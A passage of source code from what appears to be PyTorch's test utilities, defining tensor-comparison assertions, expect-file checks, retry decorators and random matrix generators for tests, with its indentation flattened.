atol: Optional[float] = None, rtol: Optional[float] = None,
equal_nan=True, exact_dtype=True, exact_device=False) -> None:
assert (atol is None) == (rtol is None), "If one of atol or rtol is specified, then the other must be too"
debug_msg: Optional[str] = None
if x is None or y is None:
self.assertTrue(x is None and y is None)
# Tensor x Number and Number x Tensor comparisons
elif isinstance(x, torch.Tensor) and isinstance(y, Number):
self.assertEqual(x.item(), y, atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif isinstance(y, torch.Tensor) and isinstance(x, Number):
self.assertEqual(x, y.item(), atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
# Tensor x np.bool
elif isinstance(x, torch.Tensor) and isinstance(y, np.bool_):
self.assertEqual(x.item(), y, atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif isinstance(y, torch.Tensor) and isinstance(x, np.bool_):
self.assertEqual(x, y.item(), atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
# Tensor x Tensor
elif isinstance(x, torch.Tensor) and isinstance(y, torch.Tensor):
debug_msg = ("Attempted to compare with different is_sparse settings: "
f"Expected: {x.is_sparse}; Actual: {y.is_sparse}.")
super().assertEqual(x.is_sparse, y.is_sparse, msg=self._get_assert_msg(msg=msg, debug_msg=debug_msg))
debug_msg = ("Attempted to compare with different is_quantized settings: "
f"Expected: {x.is_quantized}; Actual: {y.is_quantized}.")
super().assertEqual(x.is_quantized, y.is_quantized, msg=self._get_assert_msg(msg=msg, debug_msg=debug_msg))
if x.is_sparse:
if x.size() != y.size():
debug_msg_sparse = ("Attempted to compare equality of tensors with different sizes: "
f"Expected: {x.size()}; Actual: {y.size()}.")
super().assertTrue(False, msg=self._get_assert_msg(msg=msg, debug_msg=debug_msg_sparse))
x = x.coalesce()
y = y.coalesce()
indices_result, debug_msg_indices = self._compareTensors(x._indices(), y._indices(),
rtol=rtol, atol=atol,
equal_nan=equal_nan, exact_dtype=exact_dtype,
exact_device=exact_device)
if not indices_result:
assert debug_msg_indices is not None
debug_msg = "Sparse tensor indices failed to compare as equal! " + debug_msg_indices
super().assertTrue(indices_result, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
values_result, debug_msg_values = self._compareTensors(x._values(), y._values(),
rtol=rtol, atol=atol,
equal_nan=equal_nan, exact_dtype=exact_dtype,
exact_device=exact_device)
if not values_result:
assert debug_msg_values is not None
debug_msg = "Sparse tensor values failed to compare as equal! " + debug_msg_values
super().assertTrue(values_result, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
elif x.is_quantized and y.is_quantized:
self.assertEqual(x.qscheme(), y.qscheme(), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
if x.qscheme() == torch.per_tensor_affine:
self.assertEqual(x.q_scale(), y.q_scale(), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
self.assertEqual(x.q_zero_point(), y.q_zero_point(),
atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif x.qscheme() == torch.per_channel_affine:
self.assertEqual(x.q_per_channel_scales(), y.q_per_channel_scales(), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
self.assertEqual(x.q_per_channel_zero_points(), y.q_per_channel_zero_points(),
atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
self.assertEqual(x.q_per_channel_axis(), y.q_per_channel_axis(),
atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
result, debug_msg_compare = self._compareTensors(x.int_repr().to(torch.int32),
y.int_repr().to(torch.int32),
atol=atol, rtol=rtol,
exact_dtype=exact_dtype,
exact_device=exact_device)
if not result:
assert debug_msg_compare is not None
debug_msg = "Quantized representations failed to compare as equal! " + debug_msg_compare
super().assertTrue(result, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
else:
result, debug_msg_generic = self._compareTensors(x, y, rtol=rtol, atol=atol,
equal_nan=equal_nan, exact_dtype=exact_dtype,
exact_device=exact_device)
if not result:
assert debug_msg_generic is not None
debug_msg = "Tensors failed to compare as equal!" + debug_msg_generic
super().assertTrue(result, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
elif isinstance(x, (np.ndarray, torch.Tensor)) or isinstance(y, (np.ndarray, torch.Tensor)):
def maybe_to_tensor(a: Union[np.ndarray, torch.Tensor]) -> Union[np.ndarray, torch.Tensor]:
if not isinstance(a, np.ndarray):
return a
try:
return torch.from_numpy(a)
except TypeError:
# This happens if the dtype is non-numeric or not supported by torch
return a
def maybe_to_list(a: Any) -> Any:
if not isinstance(a, (np.ndarray, torch.Tensor)):
return a
return a.tolist()
x = maybe_to_tensor(x)
y = maybe_to_tensor(y)
if isinstance(x, torch.Tensor) and isinstance(y, torch.Tensor):
self.assertEqual(
x, y, atol=atol, rtol=rtol, msg=msg, exact_dtype=exact_dtype, exact_device=exact_device
)
else:
# In case we can't convert the array to a tensor, we fall back to comparing x and y as iterables
self.assertEqual(
maybe_to_list(x),
maybe_to_list(y),
atol=atol,
rtol=rtol,
msg=msg,
exact_dtype=exact_dtype,
exact_device=exact_device
)
elif isinstance(x, string_classes) and isinstance(y, string_classes):
debug_msg = ("Attempted to compare [string] types: "
f"Expected: {repr(x)}; Actual: {repr(y)}.")
super().assertEqual(x, y, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
elif type(x) == set and type(y) == set:
debug_msg = ("Attempted to compare [set] types: "
f"Expected: {x}; Actual: {y}.")
super().assertEqual(x, y, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
elif self._is_dict(x) and self._is_dict(y):
if isinstance(x, OrderedDict) and isinstance(y, OrderedDict):
self.assertEqual(x.items(), y.items(), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
else:
self.assertEqual(set(x.keys()), set(y.keys()), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
key_list = list(x.keys())
self.assertEqual([x[k] for k in key_list],
[y[k] for k in key_list],
atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif isinstance(x, type) and isinstance(y, type):
# See TestTorch.test_assert_equal_generic_meta
debug_msg = ("Attempted to compare [type] types: "
f"Expected: {x}; Actual: {y}.")
super().assertEqual(x, y, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
elif is_iterable(x) and is_iterable(y):
debug_msg = ("Attempted to compare the lengths of [iterable] types: "
f"Expected: {len(x)}; Actual: {len(y)}.")
super().assertEqual(len(x), len(y), msg=self._get_assert_msg(msg, debug_msg=debug_msg))
for x_, y_ in zip(x, y):
self.assertEqual(x_, y_, atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif isinstance(x, bool) and isinstance(y, bool):
super().assertTrue(x == y, msg=msg)
# Scalar x Scalar
elif isinstance(x, Number) and isinstance(y, Number):
result, debug_msg_scalars = self._compareScalars(x, y, rtol=rtol, atol=atol,
equal_nan=equal_nan)
if not result:
assert debug_msg_scalars is not None
debug_msg = "Scalars failed to compare as equal! " + debug_msg_scalars
super().assertTrue(result, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
else:
super().assertEqual(x, y, msg=msg)
def assertNotEqual(self, x, y, msg: Optional[str] = None, *, # type: ignore[override]
atol: Optional[float] = None, rtol: Optional[float] = None, **kwargs) -> None:
with self.assertRaises(AssertionError, msg=msg):
self.assertEqual(x, y, msg, atol=atol, rtol=rtol, **kwargs)
def assertEqualTypeString(self, x, y) -> None:
# This API is used simulate deprecated x.type() == y.type()
self.assertEqual(x.device, y.device)
self.assertEqual(x.dtype, y.dtype)
self.assertEqual(x.is_sparse, y.is_sparse)
def assertObjectIn(self, obj: Any, iterable: Iterable[Any]) -> None:
for elem in iterable:
if id(obj) == id(elem):
return
raise AssertionError("object not found in iterable")
# Reimplemented to provide special behavior when
# _ignore_not_implemented_error is True
def assertRaises(self, expected_exception, *args, **kwargs):
if self._ignore_not_implemented_error:
context: Optional[AssertRaisesContextIgnoreNotImplementedError] = \
AssertRaisesContextIgnoreNotImplementedError(expected_exception, self) # type: ignore[call-arg]
try:
return context.handle('assertRaises', args, kwargs) # type: ignore[union-attr]
finally:
# see https://bugs.python.org/issue23890
context = None
else:
return super().assertRaises(expected_exception, *args, **kwargs)
# Reimplemented to provide special behavior when
# _ignore_not_implemented_error is True
def assertRaisesRegex(self, expected_exception, expected_regex, *args, **kwargs):
# Verifies that an exception with the type expected_exception and message
# matching the regular expression defined by expected_regex is thrown.
# If the test is instantiated for a non-native device type (like XLA)
# then the message is not validated.
# Checks whether the test is instantiated for a device type by testing
# if the test class has defined the device_type attribute and,
# if so, tests whether the instantiated device type is native or not
if hasattr(self, 'device_type') and self.device_type not in NATIVE_DEVICES: # type: ignore[attr-defined]
# empty string matches any string
expected_regex = ''
if self._ignore_not_implemented_error:
context = AssertRaisesContextIgnoreNotImplementedError( # type: ignore[call-arg]
expected_exception, self, expected_regex)
return context.handle('assertRaisesRegex', args, kwargs) # type: ignore[attr-defined]
else:
return super().assertRaisesRegex(expected_exception, expected_regex, *args, **kwargs)
# TODO: Support context manager interface
# NB: The kwargs forwarding to callable robs the 'subname' parameter.
# If you need it, manually apply your callable in a lambda instead.
def assertExpectedRaises(self, exc_type, callable, *args, **kwargs):
subname = None
if 'subname' in kwargs:
subname = kwargs['subname']
del kwargs['subname']
try:
callable(*args, **kwargs)
except exc_type as e:
self.assertExpected(str(e), subname)
return
# Don't put this in the try block; the AssertionError will catch it
self.fail(msg="Did not raise when expected to")
def assertNotWarn(self, callable, msg=''):
r"""
Test if :attr:`callable` does not raise a warning.
"""
with warnings.catch_warnings(record=True) as ws:
warnings.simplefilter("always") # allow any warning to be raised
with set_warn_always_context(True):
callable()
self.assertTrue(len(ws) == 0, msg)
@contextmanager
def assertWarnsOnceRegex(self, category, regex=''):
"""Context manager for code that *must always* warn
This filters expected warnings from the test and fails if
the expected warning is not caught. It uses set_warn_always() to force
TORCH_WARN_ONCE to behave like TORCH_WARN
"""
pattern = re.compile(regex)
with warnings.catch_warnings(record=True) as ws:
warnings.simplefilter("always") # allow any warning to be raised
with set_warn_always_context(True):
yield
if len(ws) == 0:
self.fail('no warning caught')
self.assertTrue(any([type(w.message) is category for w in ws]))
self.assertTrue(
any([re.match(pattern, str(w.message)) for w in ws]),
f'{pattern}, {[w.message for w in ws if type(w.message) is category]}')
def assertExpected(self, s, subname=None):
r"""
Test that a string matches the recorded contents of a file
derived from the name of this test and subname. This file
is placed in the 'expect' directory in the same directory
as the test script. You can automatically update the recorded test
output using --accept.
If you call this multiple times in a single function, you must
give a unique subname each time.
"""
if not isinstance(s, str):
raise TypeError("assertExpected is strings only")
def remove_prefix(text, prefix):
if text.startswith(prefix):
return text[len(prefix):]
return text
# NB: we take __file__ from the module that defined the test
# class, so we place the expect directory where the test script
# lives, NOT where test/common_utils.py lives. This doesn't matter in
# PyTorch where all test scripts are in the same directory as
# test/common_utils.py, but it matters in onnx-pytorch
module_id = self.__class__.__module__
munged_id = remove_prefix(self.id(), module_id + ".")
test_file = os.path.realpath(sys.modules[module_id].__file__)
expected_file = os.path.join(os.path.dirname(test_file),
"expect",
munged_id)
subname_output = ""
if subname:
expected_file += "-" + subname
subname_output = " ({})".format(subname)
expected_file += ".expect"
expected = None
def accept_output(update_type):
print("Accepting {} for {}{}:\n\n{}".format(update_type, munged_id, subname_output, s))
with open(expected_file, 'w') as f:
# Adjust for producer_version, leave s unmodified
s_tag = re.sub(r'(producer_version): "[0-9.]*"',
r'\1: "CURRENT_VERSION"', s)
f.write(s_tag)
try:
with open(expected_file) as f:
expected = f.read()
except IOError as e:
if e.errno != errno.ENOENT:
raise
elif expecttest.ACCEPT:
return accept_output("output")
else:
raise RuntimeError(
("I got this output for {}{}:\n\n{}\n\n"
"No expect file exists; to accept the current output, run:\n"
"python {} {} --accept").format(munged_id, subname_output, s, __main__.__file__, munged_id)) from None
# a hack for JIT tests
if IS_WINDOWS:
expected = re.sub(r'CppOp\[(.+?)\]', 'CppOp[]', expected)
s = re.sub(r'CppOp\[(.+?)\]', 'CppOp[]', s)
# Adjust for producer_version
expected = expected.replace(
'producer_version: "CURRENT_VERSION"',
'producer_version: "{}"'.format(torch.onnx.producer_version)
)
if expecttest.ACCEPT:
if expected != s:
return accept_output("updated output")
else:
if hasattr(self, "assertMultiLineEqual"):
# Python 2.7 only
# NB: Python considers lhs "old" and rhs "new".
self.assertMultiLineEqual(expected, s)
else:
self.assertEqual(s, expected)
def assertExpectedStripMangled(self, s, subname=None):
s = re.sub(r'__torch__[^ ]+', '', s)
self.assertExpected(s, subname)
def assertGreaterAlmostEqual(self, first, second, places=None, msg=None, delta=None):
"""Assert that ``first`` is greater than or almost equal to ``second``.
The equality of ``first`` and ``second`` is determined in a similar way to
the ``assertAlmostEqual`` function of the standard library.
"""
if delta is not None and places is not None:
raise TypeError("specify delta or places not both")
if first >= second:
return
diff = second - first
if delta is not None:
if diff <= delta:
return
standardMsg = f"{first} not greater than or equal to {second} within {delta} delta"
else:
if places is None:
places = 7
if round(diff, places) == 0:
return
standardMsg = f"{first} not greater than or equal to {second} within {places} places"
msg = self._formatMessage(msg, standardMsg)
raise self.failureException(msg)
# run code in subprocess and capture exceptions.
@staticmethod
def run_process_no_exception(code, env=None):
import subprocess
popen = subprocess.Popen(
[sys.executable, '-c', code],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=env)
(stdout, stderr) = popen.communicate()
return (stdout, stderr)
# returns captured stderr
@staticmethod
def runWithPytorchAPIUsageStderr(code):
env = os.environ.copy()
env["PYTORCH_API_USAGE_STDERR"] = "1"
# remove IN_CI flag since this is a wrapped test process.
# IN_CI flag should be set in the parent process only.
if "IN_CI" in env.keys():
del env["IN_CI"]
(stdout, stderr) = TestCase.run_process_no_exception(code, env=env)
return stderr.decode('ascii')
def download_file(url, binary=True):
from urllib.parse import urlsplit
from urllib import request, error
filename = os.path.basename(urlsplit(url)[2])
data_dir = get_writable_path(os.path.join(os.path.dirname(__file__), 'data'))
path = os.path.join(data_dir, filename)
if os.path.exists(path):
return path
try:
data = request.urlopen(url, timeout=15).read()
with open(path, 'wb' if binary else 'w') as f:
f.write(data)
return path
except error.URLError as e:
msg = "could not download test file '{}'".format(url)
warnings.warn(msg, RuntimeWarning)
raise unittest.SkipTest(msg) from e
def find_free_port():
"""
Finds an available port and returns that port number.
NOTE: If this function is being used to allocate a port to Store (or
indirectly via init_process_group or init_rpc), it should be used
in conjuction with the `retry_on_connect_failures` decorator as there is a potential
race condition where the allocated port may become unavailable before it can be used
"""
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as sock:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('localhost', 0))
_, port = sock.getsockname()
return port
# Errors that we can get in c10d initialization for which we should retry tests for.
ADDRESS_IN_USE = "Address already in use"
CONNECT_TIMEOUT = "connect() timed out."
def retry_on_connect_failures(func=None, connect_errors=(ADDRESS_IN_USE)):
"""Reruns a test if the test returns a RuntimeError and the exception
contains one of the strings in connect_errors."""
# This if block is executed when using this function as a decorator with arguments.
if func is None:
return partial(retry_on_connect_failures, connect_errors=connect_errors)
@wraps(func)
def wrapper(*args, **kwargs):
n_retries = 10
tries_remaining = n_retries
while True:
try:
return func(*args, **kwargs)
except RuntimeError as error:
if any(connect_error in str(error) for connect_error in connect_errors):
tries_remaining -= 1
if tries_remaining == 0:
raise RuntimeError(f"Failing after {n_retries} retries with error: {str(error)}")
time.sleep(random.random())
continue
raise
return wrapper
# Decorator to retry upon certain Exceptions.
def retry(ExceptionToCheck, tries=3, delay=3, skip_after_retries=False):
def deco_retry(f):
@wraps(f)
def f_retry(*args, **kwargs):
mtries, mdelay = tries, delay
while mtries > 1:
try:
return f(*args, **kwargs)
except ExceptionToCheck as e:
msg = "%s, Retrying in %d seconds..." % (str(e), mdelay)
print(msg)
time.sleep(mdelay)
mtries -= 1
try:
return f(*args, **kwargs)
except ExceptionToCheck as e:
raise unittest.SkipTest(f"Skipping after {tries} consecutive {str(e)}") from e if skip_after_retries else e
return f_retry # true decorator
return deco_retry
# Methods for matrix generation
def random_square_matrix_of_rank(l, rank, dtype=torch.double, device='cpu'):
assert rank <= l
A = torch.randn(l, l, dtype=dtype, device=device)
u, s, vh = torch.linalg.svd(A, full_matrices=False)
for i in range(l):
if i >= rank:
s[i] = 0
elif s[i] == 0:
s[i] = 1
return (u * s.to(dtype).unsqueeze(-2)) @ vh
def random_well_conditioned_matrix(*shape, dtype, device, mean=1.0, sigma=0.001):
"""
Returns a random rectangular matrix (batch of matrices)
with singular values sampled from a Gaussian with
mean `mean` and standard deviation `sigma`.
The smaller the `sigma`, the better conditioned
the output matrix is.
"""
primitive_dtype = {
torch.float: torch.float,
torch.double: torch.double,
torch.cfloat: torch.float,
torch.cdouble: torch.double
}
x = torch.rand(shape, dtype=dtype, device=device)
m = x.size(-2)
n = x.size(-1)
u, _, vh = torch.linalg.svd(x, full_matrices=False)
s = (torch.randn(*(shape[:-2] + (min(m, n),)), dtype=primitive_dtype[dtype], device=device) * sigma + mean) \
.sort(-1, descending=True).values.to(dtype)
return (u * s.unsqueeze(-2)) @ vh
# Returns a noncontiguous (tensor with the same shape and values as t
# The noncontiguous tensor is constructed such that elements in the innermost
# dimension are separated by zeros or (whenever possible) nans
# TODO: consider more complicated noncontiguity schemes
def noncontiguous_like(t):
# Short-circuits if t is already noncontiguous
if not t.is_contiguous():
return t
# Special-cases 0-dim tensors
if t.ndim == 0:
result = t.detach().unsqueeze(0).repeat_interleave(2, dim=-1)
if t.dtype.is_floating_point or t.dtype.is_complex:
result[0] = math.nan
else:
result[0] = 0
result.set_(result.storage(), 1, t.size(), ())
result.requires_grad_(t.requires_grad)
return result
# 1+ dim tensor case
result = torch.repeat_interleave(t.detach(), 2, dim=-1)
if t.dtype.is_floating_point or t.dtype.is_complex:
result[..., 1::2] = math.nan
else:
result[..., 1::2] = 0
strides = list(result.stride())
strides[-1] = strides[-1] * 2
result.set_(result.storage(), result.storage_offset(), t.size(), stride=tuple(strides))
result.requires_grad_(t.requires_grad)
return result
# TODO: remove this (prefer make_symmetric_matrices below)
def random_symmetric_matrix(l, *batches, **kwargs):
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
A = torch.randn(*(batches + (l, l)), dtype=dtype, device=device)
A = (A + A.mT).div_(2)
return A
# Creates a symmetric matrix or batch of symmetric matrices
# Shape must be a square matrix or batch of square matrices
def make_symmetric_matrices(*shape, device, dtype):
assert shape[-1] == shape[-2]
t = make_tensor(shape, device=device, dtype=dtype)
t = (t + t.mT).div_(2)
return t
def random_hermitian_matrix(l, *batches, **kwargs):
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
A = torch.randn(*(batches + (l, l)), dtype=dtype, device=device)
A = (A + A.mH).div_(2)
return A
def random_symmetric_psd_matrix(l, *batches, **kwargs):
"""
Returns a batch of random symmetric positive-semi-definite matrices.
The shape of the result is batch_dims + (matrix_size, matrix_size)
The following example creates a tensor of size 2 x 4 x 3 x 3
>>> matrices = random_symmetric_psd_matrix(3, 2, 4, dtype=dtype, device=device)
"""
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
A = torch.randn(*(batches + (l, l)), dtype=dtype, device=device)
return A @ A.mT
def random_hermitian_psd_matrix(matrix_size, *batch_dims, dtype=torch.double, device='cpu'):
"""
Returns a batch of random Hermitian positive-semi-definite matrices.
The shape of the result is batch_dims + (matrix_size, matrix_size)
The following example creates a tensor of size 2 x 4 x 3 x 3
>>> matrices = random_hermitian_psd_matrix(3, 2, 4, dtype=dtype, device=device)
"""
A = torch.randn(*(batch_dims + (matrix_size, matrix_size)), dtype=dtype, device=device)
return A @ A.mH
# TODO: remove this (prefer make_symmetric_pd_matrices below)
def random_symmetric_pd_matrix(matrix_size, *batch_dims, **kwargs):
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
A = torch.randn(*(batch_dims + (matrix_size, matrix_size)),
dtype=dtype, device=device)
return torch.matmul(A, A.mT) \
+ torch.eye(matrix_size, dtype=dtype, device=device) * 1e-5
# Creates a symmetric positive-definite matrix or batch of
# such matrices
def make_symmetric_pd_matrices(*shape, device, dtype):
assert shape[-1] == shape[-2]
t = make_tensor(shape, device=device, dtype=dtype)
i = torch.eye(shape[-1], device=device, dtype=dtype) * 1e-5
return t @ t.mT + i
def random_hermitian_pd_matrix(matrix_size, *batch_dims, dtype, device):
"""
Returns a batch of random Hermitian positive-definite matrices.
The shape of the result is batch_dims + (matrix_size, matrix_size)
The following example creates a tensor of size 2 x 4 x 3 x 3
>>> matrices = random_hermitian_pd_matrix(3, 2, 4, dtype=dtype, device=device)
"""
A = torch.randn(*(batch_dims + (matrix_size, matrix_size)),
dtype=dtype, device=device)
return A @ A.mH + torch.eye(matrix_size, dtype=dtype, device=device)
# Creates a full rank matrix with distinct signular values or
# a batch of such matrices
def make_fullrank_matrices_with_distinct_singular_values(*shape, device, dtype, requires_grad=False):
with torch.no_grad():
t = make_tensor(shape, device=device, dtype=dtype)
u, _, vh = torch.linalg.svd(t, full_matrices=False)
# TODO: improve the handling of complex tensors here
real_dtype = t.real.dtype if t.dtype.is_complex else t.dtype
k = min(shape[-1], shape[-2])
# We choose the singular values to be "around one"
# This is to make the matrix well conditioned
# s = [2, 3, ..., k+1]
s = torch.arange(2, k + 2, dtype=real_dtype, device=device)
# s = [2, -3, 4, ..., (-1)^k k+1]
s[1::2] *= -1.
# 1 + 1/s so that the singular values are in the range [2/3, 3/2]
# This gives a condition number of 9/4, which should be good enough
s.reciprocal_().add_(1.)
# Note that the singular values need not be ordered in an SVD so
# we don't need need to sort S
x = (u * s.to(u.dtype)) @ vh
x.requires_grad_(requires_grad)
return x
def random_matrix(rows, columns, *batch_dims, **kwargs):
"""Return rectangular matrix or batches of rectangular matrices.
Parameters:
dtype - the data type
device - the device kind
singular - when True, the output will be singular
"""
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
silent = kwargs.get("silent", False)
singular = kwargs.get("singular", False)
if silent and not torch._C.has_lapack:
return torch.ones(rows, columns, dtype=dtype, device=device)
A = torch.randn(batch_dims + (rows, columns), dtype=dtype, device=device)
if A.numel() == 0:
return A
u, _, vh = torch.linalg.svd(A, full_matrices=False)
k = min(rows, columns)
s = torch.linspace(1 / (k + 1), 1, k, dtype=dtype, device=device)
if singular:
# make matrix singular
s[k - 1] = 0
if k > 2:
# increase the order of singularity so that the pivoting
# in LU factorization will be non-trivial
s[0] = 0
return (u * s.unsqueeze(-2)) @ vh
def random_lowrank_matrix(rank, rows, columns, *batch_dims, **kwargs):
"""Return rectangular matrix or batches of rectangular matrices with
given rank.
"""
B = random_matrix(rows, rank, *batch_dims, **kwargs)
C = random_matrix(rank, columns, *batch_dims, **kwargs)
return B.matmul(C)
def random_sparse_matrix(rows, columns, density=0.01, **kwargs):
"""Return rectangular random sparse matrix within given density.
The density of the result approaches to given density as the size
of the matrix is increased and a relatively small value of density
is specified but higher than min(rows, columns)/(rows * columns)
for non-singular matrices.
"""
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
singular = kwargs.get("singular", False)
k = min(rows, columns)
nonzero_elements = max(min(rows, columns), int(rows * columns * density))
row_indices = [i % rows for i in range(nonzero_elements)]
column_indices = [i % columns for i in range(nonzero_elements)]
random.shuffle(column_indices)
indices = [row_indices, column_indices]
values = torch.randn(nonzero_elements, dtype=dtype, device=device)
# ensure that the diagonal dominates
values *= torch.tensor([-float(i - j)**2 for i, j in zip(*indices)], dtype=dtype, device=device).exp()
indices_tensor = torch.tensor(indices)
A = torch.sparse_coo_tensor(indices_tensor, values, (rows, columns), device=device)
return A.coalesce()
def random_sparse_pd_matrix(matrix_size, density=0.01, **kwargs):
"""Return random sparse positive-definite matrix with given density.
The eigenvalues of the matrix are defined as::
arange(1, matrix_size+1)/matrix_size
Algorithm:
A = diag(arange(1, matrix_size+1)/matrix_size)
while <A density is smaller than required>:
<choose random i, j in range(matrix_size), theta in [0, 2*pi]>
R = <rotation matrix (i,j,theta)>
A = R^T A R
"""
import math
torch = kwargs.get('torch', globals()['torch'])
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
data = dict([((i, i), float(i + 1) / matrix_size)
for i in range(matrix_size)])
def multiply(data, N, i, j, cs, sn, left=True):
for k in range(N):
if left:
ik, jk = (k, i), (k, j)
else:
ik, jk = (i, k), (j, k)
aik, ajk = data.get(ik, 0), data.get(jk, 0)
aik, ajk = cs * aik + sn * ajk, -sn * aik + cs * ajk
if aik:
data[ik] = aik
else:
data.pop(ik, None)
if ajk:
data[jk] = ajk
else:
data.pop(jk, None)
target_nnz = density * matrix_size * matrix_size
while len(data) < target_nnz:
i = random.randint(0, matrix_size - 1)
j = random.randint(0, matrix_size - 1)
if i != j:
theta = random.uniform(0, 2 * math.pi)
cs = math.cos(theta)
sn = math.sin(theta)
multiply(data, matrix_size, i, j, cs, sn, left=True)
multiply(data, matrix_size, i, j, cs, sn, left=False)
icoords, jcoords, values = [], [], []
for (i, j), v in sorted(data.items()):
icoords.append(i)
jcoords.append(j)
values.append(v)
indices_tensor = torch.tensor([icoords, jcoords])
return torch.sparse_coo_tensor(indices_tensor, values, (matrix_size, matrix_size), dtype=dtype, device=device)
def do_test_dtypes(self, dtypes, layout, device):
for dtype in dtypes:
if dtype != torch.float16:
out = torch.zeros((2, 3), dtype=dtype, layout=layout, device=device)
self.assertIs(dtype, out.dtype)
self.assertIs(layout, out.layout)
self.assertEqual(device, out.device)
def do_test_empty_full(self, dtypes, layout, device):
shape = torch.Size([2, 3])
def check_value(tensor, dtype, layout, device, value, requires_grad):
self.assertEqual(shape, tensor.shape)
self.assertIs(dtype, tensor.dtype)
self.assertIs(layout, tensor.layout)
self.assertEqual(tensor.requires_grad, requires_grad)
if tensor.is_cuda and device is not None:
self.assertEqual(device, tensor.device)
if value is not None:
fill = tensor.new(shape).fill_(value)
self.assertEqual(tensor, fill)
def get_int64_dtype(dtype):
module = '.'.join(str(dtype).split('.')[1:-1])
if not module:
return torch.int64
return operator.attrgetter(module)(torch).int64
default_dtype = torch.get_default_dtype()
check_value(torch.empty(shape), default_dtype, torch.strided, -1, None, False)
check_value(torch.full(shape, -5.), default_dtype, torch.strided, -1, None, False)
for dtype in dtypes:
for rg in {dtype.is_floating_point, False}:
int64_dtype = get_int64_dtype(dtype)
v = torch.empty(shape, dtype=dtype, device=device, layout=layout, requires_grad=rg)
check_value(v, dtype, layout, device, None, rg)
out = v.new()
check_value(torch.empty(shape, out=out, device=device, layout=layout, requires_grad=rg),
dtype, layout, device, None, rg)
check_value(v.new_empty(shape), dtype, layout, device, None, False)
check_value(v.new_empty(shape, dtype=int64_dtype, device=device, requires_grad=False),
int64_dtype, layout, device, None, False)
check_value(torch.empty_like(v), dtype, layout, device, None, False)
check_value(torch.empty_like(v, dtype=int64_dtype, layout=layout, device=device, requires_grad=False),
int64_dtype, layout, device, None, False)
if dtype is not torch.float16 and layout != torch.sparse_coo:
fv = 3
v = torch.full(shape, fv, dtype=dtype, layout=layout, device=device, requires_grad=rg)
check_value(v, dtype, layout, device, fv, rg)
check_value(v.new_full(shape, fv + 1), dtype, layout, device, fv + 1, False)
out = v.new()
check_value(torch.full(shape, fv + 2, out=out, device=device, layout=layout, requires_grad=rg),
dtype, layout, device, fv + 2, rg)
check_value(v.new_full(shape, fv + 3, dtype=int64_dtype, device=device, requires_grad=False),
int64_dtype, layout, device, fv + 3, False)
check_value(torch.full_like(v, fv + 4), dtype, layout, device, fv + 4, False)
check_value(torch.full_like(v, fv + 5,
dtype=int64_dtype, layout=layout, device=device, requires_grad=False),
int64_dtype, layout, device, fv + 5, False)
# this helper method is to recursively
# clone the tensor-type input of operators tested by OpInfo
def clone_input_helper(input):
if isinstance(input, torch.Tensor):
return torch.clone(input)
if isinstance(input, Sequence):
return tuple(map(clone_input_helper, input))
return input
THESE_TAKE_WAY_TOO_LONG = {
'test_Conv3d_groups',
'test_conv_double_backward',
'test_conv_double_backward_groups',
'test_Conv3d_dilated',
'test_Conv3d_stride_padding',
'test_Conv3d_dilated_strided',
'test_Conv3d',
'test_Conv2d_dilated',
'test_ConvTranspose3d_dilated',
'test_ConvTranspose2d_dilated',
'test_snli',
'test_Conv2d',
'test_Conv2d_padding',
'test_ConvTranspose2d_no_bias',
'test_ConvTranspose2d',
'test_ConvTranspose3d',
'test_Conv2d_no_bias',
'test_matmul_4d_4d',
'test_multinomial_invalid_probs',
}
running_script_path = None
def set_running_script_path():
global running_script_path
try:
running_file = os.path.abspath(os.path.realpath(sys.argv[0]))
if running_file.endswith('.py'): # skip if the running file is not a script
running_script_path = running_file
except Exception:
pass
def check_test_defined_in_running_script(test_case):
if running_script_path is None:
return
test_case_class_file = os.path.abspath(os.path.realpath(inspect.getfile(test_case.__class__)))
assert test_case_class_file == running_script_path, "Class of loaded TestCase \"{}\" " \
"is not defined in the running script \"{}\", but in \"{}\". Did you " \
"accidentally import a unittest.TestCase from another file?".format(
test_case.id(), running_script_path, test_case_class_file)
def load_tests(loader, tests, pattern):
set_running_script_path()
test_suite = unittest.TestSuite()
for test_group in tests:
for test in test_group:
check_test_defined_in_running_script(test)
test_suite.addTest(test)
return test_suite
class BytesIOContext(io.BytesIO):
def __enter__(self):
return self
def __exit__(self, *args):
pass
